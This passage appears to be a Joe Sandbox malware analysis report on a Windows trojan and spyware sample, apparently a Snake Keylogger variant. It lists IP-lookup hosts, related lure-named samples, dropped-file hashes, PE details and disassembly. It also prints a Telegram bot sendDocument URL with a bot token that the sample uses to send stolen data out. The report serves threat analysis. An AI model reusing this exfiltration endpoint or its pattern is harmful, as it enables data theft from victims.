                                    http://checkip.dyndns.org/qVIAmJUhQ54.exe, 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                      high
                                      http://reallyfreegeoip.orgRegSvcs.exe, 00000008.00000002.3714455601.0000000002B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://reallyfreegeoip.orgRegSvcs.exe, 00000008.00000002.3714455601.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.orgRegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.microsoft.RegSvcs.exe, 00000008.00000002.3715795244.0000000005F30000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/bot7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo/sendDocument?chat_id=6712RegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.comRegSvcs.exe, 00000008.00000002.3714455601.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://api.telegram.orgRegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000008.00000002.3714455601.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/bot-/sendDocument?chat_id=VIAmJUhQ54.exe, 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        high
                                                        https://reallyfreegeoip.org/xml/VIAmJUhQ54.exe, 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          api.telegram.orgUnited Kingdom
                                                          62041TELEGRAMRUfalse
                                                          193.122.130.0
                                                          checkip.dyndns.comUnited States
                                                          31898ORACLE-BMC-31898USfalse
                                                          104.21.80.1
                                                          reallyfreegeoip.orgUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1587606
                                                          Start date and time:2025-01-10 15:34:03 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 7m 55s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:13
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:VIAmJUhQ54.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:b118fff1b6ca5b742655af56712876b102e632c1623091ebd3cc9a8d1a639f84.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 59
                                                          • Number of non-executed functions: 294
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 52.149.20.212
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          TimeTypeDescription
                                                          09:35:03API Interceptor10874913x Sleep call for process: RegSvcs.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          149.154.167.220PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                              https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                              193.122.130.0bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • checkip.dyndns.org/
                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • checkip.dyndns.org/
                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • checkip.dyndns.org/
                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • checkip.dyndns.org/
                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • checkip.dyndns.org/
                                                                              ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              checkip.dyndns.combd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 193.122.130.0
                                                                              PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 193.122.6.168
                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 193.122.130.0
                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                              • 158.101.44.242
                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 193.122.130.0
                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              reallyfreegeoip.orgbd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.80.1
                                                                              Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 104.21.48.1
                                                                              PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.96.1
                                                                              IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.64.1
                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.48.1
                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.32.1
                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                              • 104.21.80.1
                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.64.1
                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.96.1
                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.96.1
                                                                              api.telegram.orgPO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.220
                                                                              https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.220
                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              TELEGRAMRUPO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.220
                                                                              https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.220
                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              CLOUDFLARENETUSVYLigyTDuW.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.74.152
                                                                              bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.80.1
                                                                              PO-0005082025 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 172.67.131.144
                                                                              zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                              • 188.114.96.3
                                                                              Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 104.21.48.1
                                                                              PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.96.1
                                                                              http://www.lpb.gov.lrGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                              • 104.17.25.14
                                                                              https://samantacatering.com/Get hashmaliciousUnknownBrowse
                                                                              • 104.21.83.97
                                                                              https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGNGet hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              https://www.filemail.com/d/rxythqchkhluipl?skipreg=trueGet hashmaliciousUnknownBrowse
                                                                              • 104.17.24.14
                                                                              ORACLE-BMC-31898USbd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 193.122.130.0
                                                                              PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 193.122.6.168
                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 193.122.130.0
                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                              • 158.101.44.242
                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 193.122.130.0
                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 193.122.130.0
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              54328bd36c14bd82ddaa0c04b25ed9adbd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 104.21.80.1
                                                                              Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 104.21.80.1
                                                                              PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.80.1
                                                                              IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.80.1
                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.80.1
                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.80.1
                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                              • 104.21.80.1
                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.80.1
                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.80.1
                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.21.80.1
                                                                              3b5074b1b5d032e5620f69f9f700ff0eVYLigyTDuW.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              QUOTATION-9044456778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                              • 149.154.167.220
                                                                              PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGNGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 149.154.167.220
                                                                              XClient.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              1736491685cd440ba02224486139c45779065ac91a3edb422c48d3d3c6920c4d30fc9d2bfc582.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                              • 149.154.167.220
                                                                              https://aqctslc.com/Get hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              No context
                                                                              Process:C:\Users\user\Desktop\VIAmJUhQ54.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):63518
                                                                              Entropy (8bit):7.885364824771334
                                                                              Encrypted:false
                                                                              SSDEEP:768:EngsoQ42oxw97x6I7Hp5FPzHQS4Ko/EPLB6p/uTiURZwwfK1TQir+pISqHz1DUl6:GgsoQYeAItncctPw5w3RjK1N+kXpb+u
                                                                              MD5:D92EE44D38FC5912CF8AF1B698121141
                                                                              SHA1:859E53FDADD17DFAD5B8B335612DC86ED05597DA
                                                                              SHA-256:DB599A5ABE44F06C3575190F94B36C9A3B25D5B91CE49DB47F0B8E4285BB5C78
                                                                              SHA-512:BBF47F36E85C34CFE07C3BBF0FB690216B377100FE9D0D722D8AAAC91EF13CA5B649D2B2AEF55A81E573009DDA98EA9FF55450A3AD98EC934D61E91E5072F5F8
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:EA06..n..[.4:}6.P.R*..6.oP..*Sz$.2...SJ..C....`..N..( .....g..8N*...g.>..=.;.&'..V..*$..>..d...^M>..m.Y..E'..+s...a.M+s.5..D.D..3......Be.......R*T..>.P..*sz$....}.b.L..F.....w.Pn....2..Ff..Q.t.A..TbcK.lk3JM..]..h...x...@.N.9.......M..z......b*4.....1...V..:..9..e4...v.:.J&...B.R.L....@....*|6I.N....h....H... .p.T..>.e6...N..)..oP..8? .B..8V+......R..T||nH..7.B@..4.2..fSO....)[)..D...)....0......U....bgQ.........|.3.{.....8&.....s2p..J.8M.........$`..`.s5...QD.Vc.Z\.9y.Vi4.>.G..T(..|.E..&.I.Na3......N..'wJuf...Pj.j%.eS.l..).v=....u...K..i.z.....P.U9Lf.2.\a.....c.M.z..~.7...U)..v..Xl.z$.E.C.5...N..6...B;Z.^.3:\.={.R.t.M....K.U.t..A.\)5..Nm...".y...f...j=:.J.T-uk.V.@..s..np.......@.q.^.....eW.W=.).N%s..,.:..P.C..z......&.8..2.Vc...2.I.C)...f.1.Z`5)..ey.L...f`.._.?...ah.M.......g.*..f...Y|.....d....B.7._.s)..5y..+.;$..P.R/...J......:\.iq...P.*.......N_...f.h...s..).+..T.O@*.=J....&Q...9`..,.9.mH.s.#.\:.5.I. T..o$..F..l..H.R.|I.K.E......:>.HM...e6.-......
                                                                              Process:C:\Users\user\Desktop\VIAmJUhQ54.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):93696
                                                                              Entropy (8bit):6.86093740383633
                                                                              Encrypted:false
                                                                              SSDEEP:1536:qAKOziZl1s50gatn61cW78t6tMDwz40sF3qRqe6NP6kMerky:qAv4l1s+gkn61H7tzOqReCkMWky
                                                                              MD5:8FDBE8A85B90F0C6A8466BB826E7844B
                                                                              SHA1:3BA1281651E8D994713AF106FFBA10D213D8E99A
                                                                              SHA-256:DB87941CF63BBBF07DEB20F425BF304E02227E8ED76279A59554DDB5E478188F
                                                                              SHA-512:6DEC71E3AAE2BD49334DDB0C4AF87FE78EA77DC6C63A24FF1852C6EA4632F2F4815ED4CD404E68D98E8B6A21D0F4801383244F22568D1B83086E0C84BDC626BB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.n.COMIP2HPN..7P.PR7D2S2sK24Y4YCLMIP6HPNYN7PAPR7D2S23K24Y4YC.MIP8W.@Y.>.`.S{...ZZ8.D+[>1- i3W&>!-nU5a"'Yd[=.w.a.4[=&b@DZ.HPNYN7P..R7.3P2.qG.Y4YCLMIP.HROROgPA4S7D:S23K24W.XCLmIP6.QNYNwPApR7D0S27K24Y4YCHMIP6HPNY.6PARR7D2S21Kr.Y4ICL]IP6H@NY^7PAPR7T2S23K24Y4YC..HP}HPNY.6P.UR7D2S23K24Y4YCLMIP6.QNUN7PAPR7D2S23K24Y4YCLMIP6HPNYN7PAPR7D2S23K24Y4YCLMIP6hPNQN7PAPR7D2S2;k24.4YCLMIP6HPNw:R(5PR7PPR23k24YPXCLOIP6HPNYN7PAPR7d2SR.9AF:4YC.HIP6.QNYH7PA6S7D2S23K24Y4YC.MI..:5"6-7PMPR7D.R23I24YXXCLMIP6HPNYN7P.PRuD2S23K24Y4YCLMIP..QNYN7P.PR7F2V2+.24.YCOMIPlHPH9.7P.PR7D2S23K24Y4YCLMIP6HPNYN7PAPR7D2S23K24Y4YC.0._...'*..PAPR7D3Q17M:<Y4YCLMIPHHPN.N7P.PR7s2S2.K2444YChMIPHHPN'N7P%PR762S2RK24.4YC#MIPXHPN'N7P_Rz(D2Y..K0.y4YILg.#.HPD.O7PE#p7D8.03K6Gz4YI.NIP2;tNYD.TAPVDa2S8.N24]..CO._V6HK!aN7ZAS."B2S).m26q.YCFMcv6K.[_N7KkrR5.;S27adGD4YEd.IP<<YNYL.ZAPV.Z0{q3K8.{JJCLIbP.j.ZYN3{AzpIQ2S6.K..'"YCHfIz.6GNYJ.PkVxUD@.>3;1[84YEd.IP<`.NYH7z{P,9D2W0\.24S.s.Le.P6NPf.N7VAx.7D4S.gK22Y..CLKIz.Hx.YN1Pi.R7B2y.35.4Y0uD2~IP2cF0hN7T.V*7
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.823793125332036
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:VIAmJUhQ54.exe
                                                                              File size:987'648 bytes
                                                                              MD5:1110092c1603912d573ac4539ef601a2
                                                                              SHA1:c17d059f511e9695347a61fe40b917a6430c4c56
                                                                              SHA256:b118fff1b6ca5b742655af56712876b102e632c1623091ebd3cc9a8d1a639f84
                                                                              SHA512:344f388ecc29d7e0d435b6ef5d693b78309fc4834cb1e026be2ca24ce5472607cea80c940f15e8d8026ecaa9b48b4898800eefa31afda46f2dcd5dcbfd6df422
                                                                              SSDEEP:12288:Ptb20Qc3lT7af41ePBRYuQLKpqeUhbTv5OFgNuPPpHSgaTTiTv53K/4dZiKF6A:Ptb20pkaCqT5TBWgNQ7anCI/YZ/F6A
                                                                              TLSH:8725BF1373DDC361C7B25273BA25B701AEBF782506A1F96B2FD4093DE920122525EA73
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                              Icon Hash:aaf3e3e3938382a0
                                                                              Entrypoint:0x425f74
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6746BCFE [Wed Nov 27 06:32:30 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                              Instruction
                                                                              call 00007F5970BF10BFh
                                                                              jmp 00007F5970BE40D4h
                                                                              int3
                                                                              int3
                                                                              push edi
                                                                              push esi
                                                                              mov esi, dword ptr [esp+10h]
                                                                              mov ecx, dword ptr [esp+14h]
                                                                              mov edi, dword ptr [esp+0Ch]
                                                                              mov eax, ecx
                                                                              mov edx, ecx
                                                                              add eax, esi
                                                                              cmp edi, esi
                                                                              jbe 00007F5970BE425Ah
                                                                              cmp edi, eax
                                                                              jc 00007F5970BE45BEh
                                                                              bt dword ptr [004C0158h], 01h
                                                                              jnc 00007F5970BE4259h
                                                                              rep movsb
                                                                              jmp 00007F5970BE456Ch
                                                                              cmp ecx, 00000080h
                                                                              jc 00007F5970BE4424h
                                                                              mov eax, edi
                                                                              xor eax, esi
                                                                              test eax, 0000000Fh
                                                                              jne 00007F5970BE4260h
                                                                              bt dword ptr [004BA370h], 01h
                                                                              jc 00007F5970BE4730h
                                                                              bt dword ptr [004C0158h], 00000000h
                                                                              jnc 00007F5970BE43FDh
                                                                              test edi, 00000003h
                                                                              jne 00007F5970BE440Eh
                                                                              test esi, 00000003h
                                                                              jne 00007F5970BE43EDh
                                                                              bt edi, 02h
                                                                              jnc 00007F5970BE425Fh
                                                                              mov eax, dword ptr [esi]
                                                                              sub ecx, 04h
                                                                              lea esi, dword ptr [esi+04h]
                                                                              mov dword ptr [edi], eax
                                                                              lea edi, dword ptr [edi+04h]
                                                                              bt edi, 03h
                                                                              jnc 00007F5970BE4263h
                                                                              movq xmm1, qword ptr [esi]
                                                                              sub ecx, 08h
                                                                              lea esi, dword ptr [esi+08h]
                                                                              movq qword ptr [edi], xmm1
                                                                              lea edi, dword ptr [edi+08h]
                                                                              test esi, 00000007h
                                                                              je 00007F5970BE42B5h
                                                                              bt esi, 03h
                                                                              jnc 00007F5970BE4308h
                                                                              movdqa xmm1, dqword ptr [esi+00h]
                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [ASM] VS2012 UPD4 build 61030
